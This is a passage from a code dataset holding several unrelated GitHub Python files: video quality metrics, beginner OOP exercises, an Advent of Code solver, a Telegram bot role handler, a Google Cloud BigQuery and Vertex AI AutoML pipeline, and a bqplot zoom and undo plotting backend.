frame_data.append(cv_frame)\n \n blockiness_list.append( Blockiness.block(cv_frame) )\n blurriness_list.append( Blurriness.sobel_blur(cv_frame) ) \n # calculateCS returns a list with 8 values\n color_metrics = CCMetric.calculateCS(full_path)\n for i in range( len(color_metrics) ):\n color_list[i].append(color_metrics[i])\n noise_list.append( Noise.noise(cv_frame) )\n # BRISQUE output is 0-100. Easy to normalize now\n brisque_list.append( brisq.get_score(cv_frame) / 100 )\n # calculateGD returns a list with 9 values\n #contrast_metrics = CCMetric.calculateGD(full_path)\n #for i in range( len(contrast_metrics) ):\n # contrast_list[i].append( contrast_metrics[i] )\n \n # VIDEO NAME\n csv_out = []\n csv_out.append( vidname )\n\n # BLOCKINESS\n addFrameStats(blockiness_list, csv_out)\n\n # BLURRINESS\n addFrameStats(blurriness_list, csv_out)\n\n # COLOR\n for i in range( len(color_list) ):\n addFrameStats(color_list[i], csv_out)\n\n # NOISE\n addFrameStats(noise_list, csv_out)\n\n # BRISQUE\n addFrameStats(brisque_list, csv_out)\n\n # FLICKERING\n np_frame_array = np.array(frame_data)\n csv_out.append( NRQEmetrics.temporalFlickering(np_frame_array) )\n\n # CONTRAST\n # for i in range( len(contrast_list) ):\n # addFrameStats(contrast_list[i], csv_out)\n\n # WRITE TO CSV\n with open('live-nrqe.csv', 'a', newline='') as csvfile:\n metric_writer = csv.writer(csvfile, delimiter=',')\n metric_writer.writerow( csv_out )\n\n print( \"Time Elapsed: \", time.perf_counter() - start_time )\n\ninput_path = \"./live-test/\"\noutput_path = \"./live-frames/\"\nsample_rate = 1000 #samples at video's fps if samplerate above fps\n\n#frameExtraction.extractFrameLoop(input_path, output_path, sample_rate)\n\nprint(\"done extracting frames\")\n\nfor frame_folder in os.listdir(output_path):\n prefix, _ = frame_folder.split('-')\n frameQualityLoop(output_path + frame_folder + \"/\", prefix + \".mp4\")","repo_name":"asexton1310/discovery-project","sub_path":"ExtraFiles/quality_extractor.py","file_name":"quality_extractor.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38863711100","text":"\"\"\" class person intoduction \"\"\"\nclass Person:\n species = 'Homo sapiens'\n count = 0\n def __init__(self,id):\n self.id = id\n @classmethod\n def show_count(cls):\n print(f'There are {cls.count} {cls.species}')\n @staticmethod\n def detais():\n pass\nclass Teacher(Person):\n def __init__(self,id):\n super().__init__(id)\n self.id += 'T'\nclass Student(Person):\n def __init__(self,id):\n super().__init__(id)\n self.id += 'S'\nclass TeachingAssistant(Student, Teacher):\n def __init__(self,id):\n super().__init__(id)\n\"\"\"class person instances \"\"\"\n\nx = TeachingAssistant('2675')\nprint(x.id)\ny = Student('4567')\nprint(y.id)\nz = Teacher('3421')\nprint(z.id)\np = Person('5749')\nprint(p.id)\n\n\"\"\"class book \"\"\"\n\nclass Book:\n def __init__(self,isbn, title,author,publisher,pages,price,copies):\n self.isbn = isbn\n self.title = title\n self.author = author\n self.publisher = publisher\n self.pages = pages\n self.price = price\n self.copies = copies\n def display(self):\n print(self.title)\n print(f'ISBN : {self.isbn}')\n print(f'Price : {self.price}')\n print(f'Number of copies : {self.copies}')\n print('.' * 50)\n @staticmethod\n def detais():\n pass\n def in_stock(self):\n return True if self.copies>0 else False\n def sell(self):\n if self.in_stock():\n self.copies -= 1\n else:\n print('The book is out of stock')\n\n\"\"\"class book instances \"\"\"\n\nbook1 = Book('957-4-36-547417-1', 'Learn Physics','Stephen', 'CBC', 350, 200,10)\nbook2 = Book('652-6-86-748413-3', 'Learn Chemistry','Jack', 'CBC', 400, 220,20)\nbook3 = Book('957-7-39-347216-2', 'Learn Maths','John', 'XYZ', 500, 300,5)\nbook4 = Book('957-7-39-347216-2', 'Learn Biology','Jack', 'XYZ', 400, 200,6)\n\nbook1.display()\nbook2.display()\nbook3.display()\nbook4.display()\n\nbook3.sell()\nbook3.sell()\nbook3.sell()\nbook3.sell()\nbook3.sell()\nbook3.sell()\n\n\"\"\" course class \"\"\"\n\nclass Course:\n def __init__(self, title, instructor, lectures, price):\n self.title = title\n self.instructor = instructor\n self.price = price\n self.lectures = lectures\n self.users = []\n self.ratings = 0\n self.avg_rating = 0\n def __str__(self):\n return f'{self.title} by {self.instructor}'\n @staticmethod\n def detais():\n pass\n def new_user_enrolled(self, user):\n self.users.append(user)\n def received_a_rating(self, new_rating):\n self.avg_rating = (self.avg_rating * self.ratings + new_rating)/(self.ratings + 1)\n self.ratings += 1 \n def show_details(self):\n print('Course Title : ', self.title)\n print('Intructor : ', self.instructor)\n print('Price : ', self.price)\n print('Number of Lectures : ', self.lectures)\n print('Users : ', self.users)\n print('Average rating : ', self.avg_rating)\nclass VideoCourse(Course):\n def __init__(self,title,instructor,lectures,price,length_video):\n super().__init__(title,instructor,lectures,price)\n self.length_video = length_video\n def show_details(self):\n super().show_details()\n print('Video Length : ', self.length_video)\nclass PdfCourse(Course):\n def __init__(self,title,instructor,lectures,price,pages):\n super().__init__(title,instructor,lectures,price)\n self.pages = pages\n def show_details(self):\n super().show_details()\n print('Number of pages : ', self.pages)\n\n\"\"\"class course instances \"\"\"\n\nvc = VideoCourse('Learn C++', 'Jack', 30, 50, 10)\nvc.new_user_enrolled('Allen')\nvc.new_user_enrolled('Max')\nvc.new_user_enrolled('Tom')\nvc.received_a_rating(3)\nvc.received_a_rating(5)\nvc.received_a_rating(4)\nvc.show_details()\nprint()\npc = PdfCourse('Learn Java', 'Jim', 35, 50, 1000)\npc.new_user_enrolled('Allen')\npc.new_user_enrolled('Mary')\npc.new_user_enrolled('JIm')\npc.received_a_rating(5)\npc.received_a_rating(4)\npc.received_a_rating(4.5)\npc.show_details()\n\n\n\n","repo_name":"huckbyte/python-tool","sub_path":"phase1/code2.py","file_name":"code2.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22698242180","text":"\ndef add(a, b):\n su = f\"[{a},{b}]\"\n return reduce(su)\n\ndef reduce(number):\n done = False\n while not done:\n previous = \"\"\n while previous != number:\n previous = number\n number = explode(number)\n number = split(number)\n done = previous == number\n return number\n\ndef explode(number):\n nesting = 0\n exploding_pair_start = 0\n for i, n in enumerate(number):\n if n == \"[\":\n nesting += 1\n if nesting < 5: continue\n exploding_pair_start = i\n break\n if n == \"]\":\n nesting -= 1\n if exploding_pair_start == 0:\n return number\n \n exploding_pair_stop = number.find(\"]\", exploding_pair_start)\n pair = number[exploding_pair_start+1:exploding_pair_stop]\n regular_numbers = [ int(x) for x in pair.split(\",\") ]\n\n left_part = number[:exploding_pair_start]\n for i in range(len(left_part)-1, -1, -1):\n if not left_part[i].isdigit():\n continue\n if left_part[i-1].isdigit():\n print(\"left part 2\")\n x = int(left_part[i-1:i+1])\n left_part = f\"{left_part[:i-1]}{x + regular_numbers[0]}{left_part[i+1:]}\"\n break\n y = int(left_part[i])\n left_part = f\"{left_part[:i]}{y + regular_numbers[0]}{left_part[i+1:]}\"\n break\n\n right_part = number[exploding_pair_stop+1:]\n for i in range(len(right_part)):\n if not right_part[i].isdigit():\n break\n if right_part[i+1].isdigit():\n print(\"right part 2\")\n x = int(right_part[i:i+2])\n right_part = f\"{right_part[:i]}{x + regular_numbers[1]}{right_part[i+2:]}\"\n break\n y = int(right_part[i])\n right_part = f\"{right_part[:i]}{y + regular_numbers[1]}{right_part[i+1:]}\"\n break\n\n return f\"{left_part}0{right_part}\"\n\ndef split(number):\n for i in range(len(number)):\n if not number[i].isdigit(): continue\n if not number[i+1].isdigit(): continue\n\n x = int(number[i:i+2])\n number = f\"{number[:i]}[{x//2},{x//2+x%2}]{number[i+2:]}\"\n break\n return number\n\nclass TreeNode:\n def __init__(self, tokens):\n token = tokens.pop()\n if token.isdigit():\n self.left = None\n self.right = None\n self.is_leaf = True\n self.number = int(token)\n else:\n if token != \"]\": raise Exception\n self.right = TreeNode(tokens)\n tokens.pop()\n self.left = TreeNode(tokens)\n tokens.pop()\n self.is_leaf = False\n\n def parse(number):\n return TreeNode(list(number))\n \n def magnitude(self):\n if self.is_leaf:\n return self.number\n return 3 * self.left.magnitude() + 2 * self.right.magnitude()\n\ndef magnitude(number):\n tree = TreeNode.parse(number)\n return tree.magnitude()\n\nwith open(\"18.txt\", \"r\") as f:\n numbers = [ l.strip() for l in f.readlines() ]\nsu = numbers[0]\nfor n in numbers:\n su = add(su, n)\nprint(magnitude(su))","repo_name":"tato/advent2021","sub_path":"18c.py","file_name":"18c.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15904633862","text":"import sqlite3\n\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import StatesGroup, State\n\nfrom loader import dp, admin_id, user_db\nfrom aiogram.types import Message\nfrom view.Keyboards import kb_role_user, kb_cancel_fsm\n\n\nclass UpdUser(StatesGroup):\n user_name = State()\n user_update = State()\n user_role = State()\n\n\n@dp.message_handler(commands=['upd_user'], state=None)\nasync def upd_user(message: Message, admin: bool):\n if admin or int(admin_id) == message.from_user.id:\n await message.answer(text='Введите Фамилию)', reply_markup=kb_cancel_fsm)\n await UpdUser.user_name.set()\n else:\n await message.answer('У вас нет доступа к этой функции')\n\n\n@dp.message_handler(state=UpdUser.user_name)\nasync def user_id_up_catch(message: Message, state: FSMContext):\n user_name = message.text\n await state.update_data({'user_name': user_name})\n check = user_db.get_the_user(name=user_name)\n if check:\n await message.answer(text=f'Такой пользователь уже записан в роли {check[2]}. Выберите новый статус',\n reply_markup=kb_role_user)\n await UpdUser.user_update.set()\n else:\n await message.answer(text='Выберите роль пользователя', reply_markup=kb_role_user)\n await UpdUser.user_role.set()\n\n@dp.message_handler(state=UpdUser.user_update)\nasync def name_catch(message: Message, state: FSMContext):\n if message.text in ['admin', 'operator', 'deactivated']:\n await state.update_data({'user_role': message.text})\n data = await state.get_data()\n check = user_db.get_the_user(name=data.get('user_name'))\n try:\n user_db.update_user_status({'id': check[0], 'status': data.get('user_role')})\n await message.answer(f\"Пользователь {data.get('user_name')} обновлен в роли {data.get('user_role')}\")\n except sqlite3.OperationalError:\n await message.answer(\"Ошибка добавления роли пользователю! Проверьте правильность вводимых данных\",\n reply_markup=kb_cancel_fsm)\n await state.reset_data()\n await state.finish()\n else:\n await message.answer(text='Выберите роль пользователя', reply_markup=kb_role_user)\n\n\n@dp.message_handler(state=UpdUser.user_role)\nasync def name_catch(message: Message, state: FSMContext):\n if message.text in ['admin', 'operator', 'deactivated']:\n await state.update_data({'user_role': message.text})\n data = await state.get_data()\n try:\n user_db.add_user({'name': data.get('user_name'), 'status': data.get('user_role')})\n await message.answer(f\"Пользователь {data.get('user_name')} добавлен в роли {data.get('user_role')}\")\n except sqlite3.OperationalError:\n await message.answer(\"Ошибка добавления роли пользователю! Проверьте правильность вводимых данных\",\n reply_markup=kb_cancel_fsm)\n await state.reset_data()\n await state.finish()\n else:\n await message.answer(text='Выберите роль пользователя', reply_markup=kb_role_user)\n","repo_name":"TotskayaOV/RetentionBot","sub_path":"view/Handlers/admin/added_user.py","file_name":"added_user.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43073162983","text":"print('=' * 25)\r\nprint(' LOJA SUPER BARATAO')\r\nprint('=' * 25)\r\n\r\nsoma = maisque1000 = 0\r\ncontinuar = ''\r\nbarato = ''\r\nbaratop = 0\r\ncont = 0\r\n\r\nwhile True:\r\n nome = input('Nome do Produto: ')\r\n preço = int(input('Preço: R$'))\r\n cont += 1\r\n if cont == 1 or preço < baratop:\r\n baratop = preço\r\n barato = nome\r\n soma += preço\r\n if preço > 1000:\r\n maisque1000 += 1\r\n continuar = input('Quer continuar? [S/N] ').upper()\r\n if continuar == 'N':\r\n break\r\n\r\nprint(f'O total da compra foi: R${(soma):.2f}')\r\nprint(f'Temos {maisque1000} produtos que custam mais que R$1000,00')\r\nprint(f'O produto mais barato foi {barato} que custou R${(baratop):.2f}')\r\n\r\n","repo_name":"pennapatrick/Mundo-02-Python","sub_path":"Exercicios/ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2050552692","text":"import requests, csv \nimport pandas as pd\nfrom google.cloud import bigquery, storage, aiplatform\n\nfrom google import cloud\n\n# from google.cloud import storage\n\n\n\ncsv_url = 'https://gist.githubusercontent.com/netj/8836201/raw/6f9306ad21398ea43cba4f7d537619d0e07d5ae3/iris.csv'\n\nbucket_url ='gs://prodapt-vertex-test/water_potability.csv'\n\n#********************************************\n#with requests \nreq = requests.get(csv_url)\ntext = req.iter_lines()\nreader = csv.reader(text, delimiter=',')\nprint(type(reader))\n\n#with pandas \ndata = pd.read_csv(csv_url)\nprint(data.dtypes)\nprint(data.columns)\n\n\n#********************************************\n\n\n#**********CREATING BUCKETS\n# # Imports the Google Cloud client library\n# from google.cloud import storage\n\n# # Instantiates a client\n# storage_client = storage.Client()\n\n# # The name for the new bucket\n# bucket_name = \"my-new-bucket\"\n\n# # Creates the new bucket\n# bucket = storage_client.create_bucket(bucket_name)\n\n# print(\"Bucket {} created.\".format(bucket.name))\n\n#*********ADDING TO BUCKETS \n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n # The ID of your GCS bucket\n # bucket_name = \"your-bucket-name\"\n # The path to your file to upload\n # source_file_name = \"local/path/to/file\"\n # The ID of your GCS object\n # destination_blob_name = \"storage-object-name\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {}.\".format(\n source_file_name, destination_blob_name\n )\n )\n\n\n#****************DOWNLOADING TO BUCKETS \n\ndef download_blob(bucket_name, source_blob_name, destination_file_name):\n \"\"\"Downloads a blob from the bucket.\"\"\"\n # bucket_name = \"your-bucket-name\"\n # source_blob_name = \"storage-object-name\"\n # destination_file_name = \"local/path/to/file\"\n\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n\n # Construct a client side representation of a blob.\n # Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve\n # any content from Google Cloud Storage. As we don't need additional data,\n # using `Bucket.blob` is preferred here.\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n\n print(\n \"Blob {} downloaded to {}.\".format(\n source_blob_name, destination_file_name\n )\n )\n\n\n#***************CONNECTING TO BIG QUERY \n# export GOOGLE_APPLICATION_CREDENTIALS=\"/mnt/c/Users/ammar.ahmed/Desktop/prodapt/vertex-final/prodapt-test-3043986cc053.json\"\n\n# Construct a BigQuery client object.\nclient = bigquery.Client()\n\nyourProject = \"prodapt-test\"\nyourDataset = \"water_kaggle\"\nyourTableName = \"water_potability\"\n\ntry: \n dataset_id = \"{}.your_dataset\".format(client.project)\n\n # Construct a full Dataset object to send to the API.\n dataset = bigquery.Dataset(yourProject +'.' + yourDataset)\n\n # TODO(developer): Specify the geographic location where the dataset should reside.\n dataset.location = \"US\"\n\n # Send the dataset to the API for creation, with an explicit timeout.\n # Raises google.api_core.exceptions.Conflict if the Dataset already\n # exists within the project.\n dataset = client.create_dataset(dataset, timeout=30) # Make an API request.\n print(\"Created dataset {}.{}\".format(client.project, dataset.dataset_id))\n\nexcept cloud.exceptions.Conflict:\n print(f'Dataset {dataset.dataset_id} already exists, not creating.')\nelse:\n print(f'Dataset {dataset.dataset_id} successfully created.') \n\n\n# TODO(developer): Set table_id to the ID of the table to create.\ntable_id = f\"{yourProject}.{yourDataset}.{yourTableName}\"\n\njob_config = bigquery.LoadJobConfig(\n schema=[\n bigquery.SchemaField(\"ph\", \"FLOAT64\"),\n bigquery.SchemaField(\"Hardness\", \"FLOAT64\"),\n bigquery.SchemaField(\"Solids\", \"FLOAT64\"),\n bigquery.SchemaField(\"Chloramines\", \"FLOAT64\"),\n bigquery.SchemaField(\"Sulfate\", \"FLOAT64\"),\n bigquery.SchemaField(\"Conductivity\", \"FLOAT64\"),\n bigquery.SchemaField(\"Organic_carbon\", \"FLOAT64\"),\n bigquery.SchemaField(\"Trihalomethanes\", \"FLOAT64\"),\n bigquery.SchemaField(\"Turbidity\", \"FLOAT64\"),\n bigquery.SchemaField(\"Potability\", \"INT64\")\n ],\n skip_leading_rows=1,\n # The source format defaults to CSV, so the line below is optional.\n source_format=bigquery.SourceFormat.CSV,\n max_bad_records = 1000\n\n)\n\nload_job = client.load_table_from_uri(\n bucket_url, table_id, job_config=job_config\n) # Make an API request.\n\nload_job.result() # Waits for the job to complete.\n\ndestination_table = client.get_table(table_id) # Make an API request.\nprint(\"Loaded {} rows.\".format(destination_table.num_rows))\n\n\n\nbq_url = f'bq://{yourProject}.{yourDataset}.{yourTableName}'\nvertex_loc = 'us-central1'\n\naiplatform.init(project=yourProject, location=vertex_loc)\n\ndataset = aiplatform.TabularDataset.create(\n display_name=yourDataset, bq_source=bq_url,\n)\n\n\ndataset.wait()\n\nprint(f'\\tDataset: \"{dataset.display_name}\"')\nprint(f'\\tname: \"{dataset.resource_name}\"')\n\ndatasetLoc = dataset.resource_name\n\ndataset = aiplatform.TabularDataset(datasetLoc)\n\njob = aiplatform.AutoMLTabularTrainingJob(\n display_name=yourDataset,\n optimization_prediction_type=\"classification\",\n optimization_objective=\"maximize-au-roc\",\n)\n\nmodel = job.run(\n dataset=dataset,\n target_column=\"Potability\",\n training_fraction_split=0.6,\n validation_fraction_split=0.2,\n test_fraction_split=0.2,\n budget_milli_node_hours=1000,\n model_display_name=\"my-automl-model\",\n disable_early_stopping=False,\n)\n\n\n\nendpoint = model.deploy(machine_type=\"n1-standard-4\",\n min_replica_count=1,\n max_replica_count=5,\n accelerator_type='NVIDIA_TESLA_K80',\n accelerator_count=1)\n\n\nmodel = aiplatform.Model.upload(\n display_name='my-model',\n artifact_uri=\"gs://python/to/my/model/dir\",\n serving_container_image_uri=\"gcr.io/cloud-aiplatform/prediction/tf2-cpu.2-2:latest\",\n)\n\nmodel = aiplatform.Model(f'/projects/{yourProject}/locations/us-central1/models/{my-automl-model}')\n","repo_name":"ammaarahmed/prodapt-test","sub_path":"model_creation.py","file_name":"model_creation.py","file_ext":"py","file_size_in_byte":6358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72928659617","text":"# # alternate wrapper version in case the function should be left alone\n# def fix_image_flipping(func):\n# from functools import wraps\n# @wraps(func)\n# def wrapper(self,rgb_image):\n# return func(self, np.flipud(rgb_image))\n# return wrapper\n# BqplotBackend.update_image = fix_image_flipping(BqplotBackend.update_image)\n\n\nfrom vaex.jupyter.plot import BackendBase\nfrom vaex.jupyter.utils import debounced\nimport vaex\nimport numpy as np\nimport bqplot\nimport bqplot.pyplot as plt\nimport ipywidgets as widgets\nimport ipyvuetify as v\nimport copy\nfrom IPython.display import Image as IPyImage\nfrom IPython.display import clear_output\n\nfrom moneta.settings import TextStyle, WARNING_LABEL\nfrom PIL import Image\n\nblackish = '#666'\n\n\naccessRanges = {}\nZOOM_SELECT = 'Zoom to Selection'\nPAN_ZOOM = 'Pan Zoom test1'\nRESET_ZOOM = 'Reset Zoom'\nCLICK_ZOOM_IN = 'Click Zoom IN'\nCLICK_ZOOM_OUT = 'Click Zoom OUT'\nCLICK_ZOOM_SCALE = 0.1 # 10x zoom\nSCREENSHOT = 'Screenshot Test'\nRULER = \"Measurement\"\n\nUNDO = 'Undo'\nREDO = 'Redo'\n\nfrom enum import Enum\nclass Action(Enum):\n other = 0\n undo = 1\n redo = 2\n\nPANZOOM_HISTORY_LIMIT = 50\n\nclass BqplotBackend(BackendBase):\n def __init__(self, figure=None, figure_key=None):\n self._dirty = False\n self.figure_key = figure_key\n self.figure = figure\n self.signal_limits = vaex.events.Signal()\n\n self._cleanups = []\n # self.coor_x = 0\n # self.coor_y = 0\n self.czoom_xmin = 0\n self.czoom_xmax = 0\n self.czoom_ymin = 0\n self.czoom_ymax = 0\n self.res = 0\n self._observers = []\n\n\n def update_image(self, rgb_image):\n with self.output:\n rgb_image = (rgb_image * 255.).astype(np.uint8)\n pil_image = vaex.image.rgba_2_pil(rgb_image)\n self.pil_image_test = pil_image\n \n data = vaex.image.pil_2_data(pil_image)\n self.core_image.value = data\n # force update\n self.image.image = self.core_image_fix\n self.image.image = self.core_image\n self.image.x = (self.scale_x.min, self.scale_x.max)\n #self.image.y = (self.scale_y.min, self.scale_y.max)\n self.image.y = (self.limits[1][0], self.limits[1][1])\n self.base_address.value = f\"Base address: 0x{int(self.limits[1][0]):X}\"\n self.zoom_args.value = self.zoom_args_string()\n self.plot.update_stats()\n\n def create_widget(self, output, plot, dataset, limits):\n self.plot = plot\n self.output = output\n self.dataset = dataset\n self.limits = np.array(limits).tolist()\n def fix(v):\n # bqplot is picky about float and numpy scalars\n if hasattr(v, 'item'):\n return v.item()\n else:\n return v\n self.scale_x = bqplot.LinearScale(min=fix(limits[0][0]), max=fix(limits[0][1]), allow_padding=False)\n self.scale_y = bqplot.LinearScale(min=fix(limits[1][0]), max=fix(limits[1][1]), allow_padding=False)\n self.scales = {'x': self.scale_x, 'y': self.scale_y}\n\n self.figure = plt.figure(self.figure_key, fig=self.figure, scales=self.scales)\n self.figure.layout.width = 'calc(100% - 400px)'\n self.figure.layout.min_height = '800px'\n plt.figure(fig=self.figure)\n #self.figure.padding_y = 0\n x = np.arange(0, 10)\n y = x ** 2\n self.core_image = widgets.Image(format='png')\n self.core_image_fix = widgets.Image(format='png')\n\n self.image = bqplot.Image(scales=self.scales, image=self.core_image)\n # triggered by regular mouse click not a brush selector\n self.image.on_element_click(self.click_to_zoom)\n \n self.figure.marks = self.figure.marks + [self.image]\n self.scatter = s = plt.scatter(x, y, visible=False, rotation=x, scales=self.scales, size=x, marker=\"arrow\")\n self.panzoom = bqplot.PanZoom(scales={'x': [self.scale_x], 'y': [self.scale_y]})\n self.figure.interaction = self.panzoom\n for axes in self.figure.axes:\n axes.grid_lines = 'none'\n axes.color = axes.grid_color = axes.label_color = blackish\n self.figure.axes[0].label = plot.x_label\n self.figure.axes[1].label = plot.y_label\n self.figure.axes[1].scale = bqplot.LinearScale(min = 0, max=self.scale_y.max-self.scale_y.min, allow_padding=False)\n self.stuck_ctr = 0\n\n self.base_address = widgets.Label(value=f\"Base address: 0x{int(self.limits[1][0]):X}\")\n self.zoom_args = widgets.Text(\n description=\"Zoom Args\", \n value=self.zoom_args_string(), \n disabled=True, \n style={'description_width':'initial'},\n layout=widgets.Layout(width='50%')\n )\n\n self.curr_action = Action.other\n self.undo_actions = list()\n self.redo_actions = list()\n self.counter = 2\n self.scale_x.observe(self._update_limits)\n self.scale_y.observe(self._update_limits)\n self.widget = widgets.VBox([self.figure, self.base_address, self.zoom_args])\n self.create_tools()\n\n @debounced(0.2, method=True)\n def _update_limits(self, *args):\n with self.output:\n limits = copy.deepcopy(self.limits)\n limits[0:2] = [[scale.min, scale.max] for scale in [self.scale_x, self.scale_y]]\n self.figure.axes[1].scale=bqplot.LinearScale(min=0, max=self.scale_y.max-self.scale_y.min, allow_padding=False)\n self.figure.axes[0].scale=bqplot.LinearScale(min=self.scale_x.min, max=self.scale_x.max, allow_padding=False)\n if self.counter == 2:\n self.output.clear_output() # Disable when debugging\n self.stuck_ctr = 0\n if self.curr_action in [Action.redo, Action.other]:\n self.undo_btn.disabled = False\n self.undo_actions.append(self.limits)\n if len(self.undo_actions) > PANZOOM_HISTORY_LIMIT:\n self.undo_actions.pop(0)\n if self.curr_action == Action.redo:\n self.redo_actions.pop()\n if len(self.redo_actions) == 0:\n self.redo_btn.disabled = True\n else:\n self.redo_btn.disabled = True\n self.redo_actions.clear()\n elif self.curr_action == Action.undo:\n self.redo_btn.disabled = False\n self.redo_actions.append(self.limits)\n if len(self.redo_actions) > PANZOOM_HISTORY_LIMIT:\n self.redo_actions.pop(0)\n self.undo_actions.pop()\n if len(self.undo_actions) == 0:\n self.undo_btn.disabled = True\n self.curr_action = Action.other\n self.counter = 1\n self._update_limits(self, *args)\n else:\n self.counter = 2\n self.limits = limits\n\n\n def create_tools(self):\n self.tools = []\n self.tool_actions = []\n tool_actions_map = dict()\n\n if 1: # tool_select:\n #### initiaite the 4 types of zoom brushes, which should only highlight axis that are not locked ###\n self.zoom_brush_full = bqplot.interacts.BrushSelector(x_scale=self.scale_x, y_scale=self.scale_y, color=\"blue\")\n self.zoom_brush_full.observe(self.update_zoom_brush_full, [\"brushing\"])\n \n self.zoom_brush_vertical = bqplot.interacts.BrushIntervalSelector(scale=self.scale_y, orientation='vertical', color=\"blue\")\n self.zoom_brush_vertical.observe(self.update_zoom_brush_vertical, [\"brushing\"])\n\n self.zoom_brush_horizontal = bqplot.interacts.BrushIntervalSelector(scale=self.scale_x, orientation='horizontal', color=\"blue\")\n self.zoom_brush_horizontal.observe(self.update_zoom_brush_horizontal, [\"brushing\"])\n\n self.zoom_brush_none = bqplot.interacts.BrushSelector(x_scale=self.scale_x, y_scale=self.scale_y, color=\"gray\")\n self.zoom_brush_none.observe(self.update_zoom_brush_none, [\"brushing\"])\n\n # initiaite measurement tool\n self.ruler = bqplot.interacts.BrushSelector(x_scale=self.scale_x, y_scale=self.scale_y, color=\"blue\")\n self.ruler.observe(self.measure_selected_area, [\"brushing\"])\n #### Set the default initial tools ####\n self.zoom_brush = self.zoom_brush_full \n self.click_brush = None # use regular mouse\n self.click_brush_in = None \n self.click_brush_out = None\n\n tool_actions_map[ZOOM_SELECT] = self.zoom_brush\n tool_actions_map[PAN_ZOOM] = self.panzoom\n tool_actions_map[CLICK_ZOOM_IN] = self.click_brush_in\n tool_actions_map[CLICK_ZOOM_OUT] = self.click_brush_out\n tool_actions_map[RULER] = self.ruler\n self.tool_actions = [PAN_ZOOM, ZOOM_SELECT,\n CLICK_ZOOM_IN, CLICK_ZOOM_OUT, RULER]\n\n self.start_limits = copy.deepcopy(self.limits)\n\n def change_interact(*args):\n with self.output:\n name = self.tool_actions[self.interaction_tooltips.v_model]\n self.figure.interaction = tool_actions_map[name]\n if name == RULER:\n self.plot.model.legend.openMeasurementPanel()\n\n self.interaction_tooltips = \\\n v.BtnToggle(v_model=0, mandatory=True, multiple=False, children=[\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(children=['pan_tool'])\n ])\n }], children=[PAN_ZOOM]),\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(children=['crop'])\n ])\n }], children=[ZOOM_SELECT]),\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(\n children=['mdi-magnify-plus-cursor'])\n ])\n }], children=[CLICK_ZOOM_IN]),\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(\n children=['mdi-magnify-minus-cursor'])\n ])\n }], children=[CLICK_ZOOM_OUT]),\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(children=['mdi-ruler'])\n ])\n }], children=[RULER]) # ruler\n ])\n self.interaction_tooltips.observe(change_interact, \"v_model\")\n\n def reset(*args):\n (x1, x2), (y1, y2) = self.start_limits\n self.zoom_sel(x1, x2, y1, y2, smart_zoom=True)\n with self.zoom_brush.hold_trait_notifications():\n self.zoom_brush.selected_x = None\n self.zoom_brush.selected_y = None\n self.zoom_brush.selected = None\n \n self.screenshot_btn = v.Btn(v_on='tooltip.on', icon=True, children=[\n v.Icon(children=['mdi-camera'])\n ])\n self.screenshot_tooltip = v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': self.screenshot_btn\n }], children=[SCREENSHOT])\n @debounced(0.5)\n def screenshot():\n def peer(a):\n print(type(a).__name__)\n print(type(a).__module__)\n print(dir(a))\n \n #display(self.pil_image_test)\n # print(self.core_image.value)\n #peer(self.figure)\n #self.figure.save_png(\"test.png\")\n #display(IPyImage(\"test.png\"))\n #display(self.core.image)\n clear_output(wait=True)\n self.plot.model.plot.show()\n display(IPyImage(self.core_image.value))\n \n self.screenshot_btn.on_event('click', lambda *ignore: screenshot())\n self.reset_btn = v.Btn(v_on='tooltip.on', icon=True, children=[\n v.Icon(children=['refresh'])\n ])\n self.reset_btn.on_event('click', lambda *ignore: reset())\n self.reset_tooltip = v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': self.reset_btn\n }], children=[RESET_ZOOM])\n\n self.undo_btn = v.Btn(v_on='tooltip.on', icon=True, disabled=True, children=[\n v.Icon(children=['undo'])\n ])\n self.undo_tooltip = v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': self.undo_btn\n }], children=[UNDO])\n \n self.redo_btn = v.Btn(v_on='tooltip.on', icon=True, disabled=True, children=[\n v.Icon(children=['redo'])\n ])\n self.redo_tooltip = v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': self.redo_btn\n }], children=[REDO])\n @debounced(0.5)\n def 